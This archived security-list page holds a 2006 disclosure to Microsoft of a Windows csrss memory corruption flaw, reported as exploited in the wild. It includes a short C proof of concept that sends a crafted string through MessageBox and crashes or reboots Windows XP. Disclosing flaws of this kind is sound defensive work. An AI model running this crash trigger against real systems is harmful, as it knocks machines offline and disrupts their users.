Information Security

Additional information

  Memory corruption in Microsoft Windows

  EEYE: Windows Vista CSRSS Dangling Process Pointer Privilege Escalation

  Microsoft Security Bulletin MS07-021 Vulnerabilities in CSRSS Could Allow Remote Code Execution (930178)

  csrss.exe double-free vulnerability - arbitrary DWORD overwrite exploit

  ms ;)

From: 3APA3A <3APA3A_(at)_security.nnov.ru>
Date: December 16, 2006
Subject: Microsoft Windows csrss (?) memory corruption exploited in-the-wild

Dear Secure@microsoft.com,

 On one of the Russian forums a security vulnerability in Microsoft
 Windows is discussed (Windows XP is tested). A vulnerability is caused
 by memory corruption if a string beginning with "\?\" is sent through
 the MessageBox API with the MB_SERVICE_NOTIFICATION flag. It looks like
 some "debug" feature not cleaned out in the final release and it seems
 to be exploitable to code execution at kernel level. Code example below:


#include <stdio.h>
#include <windows.h>

int main(void){
    int i;
    char bug1[] = "\\??\\XXXX";
    for (i = 0; i < 10; i++)
    {
        MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
    }
}

System hangs, crashes (BSOD) or reboots.
 

--
http://www.security.nnov.ru
        /\_/\
       { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                   |/

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod